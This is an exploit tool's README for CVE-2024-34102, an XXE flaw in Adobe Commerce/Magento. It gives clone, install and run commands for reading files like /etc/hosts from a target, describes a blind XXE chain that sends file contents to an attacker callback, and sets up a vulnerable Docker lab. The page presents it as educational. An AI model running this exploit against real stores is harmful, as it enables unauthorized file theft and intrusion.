## https://sploitus.com/exploit?id=760B4444-4A68-518C-89AE-67D9A4EBDC6A
# CVE-2024-34102
โ Thanks to @th3gokul, Sanjaith3hacker, Chocapikk for the original code base. โ
## Description
CVE-2024-34102 : Adobe Commerce XXE vulnerability
description: Adobe Commerce versions 2.4.7, 2.4.6-p5, 2.4.5-p7, 2.4.4-p8 and earlier are affected by an Improper Restriction of XML External Entity Reference ('XXE') vulnerability that could result in arbitrary code execution. An attacker could exploit this vulnerability by sending a crafted XML document that references external entities. Exploitation of this issue does not require user interaction.
## How to use
### Git clone
```
git clone https://github.com/EQSTSeminar/CVE-2024-34102.git
cd CVE-2024-34102
```
### Install packages
```sh
pip install -r requirements.txt
```
### Command
```sh
python CVE-2024-34102.py -u <URL_TO_EXPLOIT> -f <FILE_TO_READ>
```
### Example
```sh
python CVE-2024-34102.py https://magento.test -f /etc/hosts
```
### Output
![image](https://github.com/user-attachments/assets/1320573f-bb46-4d34-b2bf-42c0a8ce28fd)
## Vulnerable Environment Based on Docker
Thanks to markshust's Docker Configuration for Magento, It isn't hard to make the vulnerable development enviromnet.
https://github.com/markshust/docker-magento
```sh
# Create your project directory then go into it:
mkdir /opt/magento
cd $_
# Install some stuff (needed for the script)
sudo apt update
sudo apt install -y bc curl
# Create Composer's directory (to avoid a weird error)
mkdir /var/www/.composer/
# Run this automated one-liner from the directory you want to install your project.
curl -s https://raw.githubusercontent.com/markshust/docker-magento/release/next/lib/onelinesetup | bash -s -- magento.test 2.4.7 community
# Submit credentials when needed.
# Edit hosts file
echo "127.0.0.1 magento.test" >> /etc/hosts
```
![image](https://github.com/user-attachments/assets/4c556255-41c5-489a-9adb-a7bcb4e24169)
## PHPSTORM
You can debug your magento using PHPSTORM.
### 1. Turn on your xdebug thru the following command:
```sh
bin/xdebug enable
```
### 2. And then setup your PHPSTORM like:
![image](https://github.com/user-attachments/assets/b4554989-d2af-452c-ada9-28b4b0352060)
..And then you can debug your magento.
# Attack Scenario
Create callback URL (mocky api) -> Blind XXE attack (CVE-2024-34102) -> Send file contents to attacker's instance (SSRFUtility) -> Read the attacker's instance (SSRFUtility)
# Disclaimer
This repository is not intended to be XXE exploit to CVE-2024-34102. The purpose of this project is to help people learn about this vulnerability, and perhaps test their own applications.
# EQST Insight
We publish CVE and malware analysis once a month. If you're interested, please follow the links below to check out our publications.
https://www.skshieldus.com/eng/business/insight.do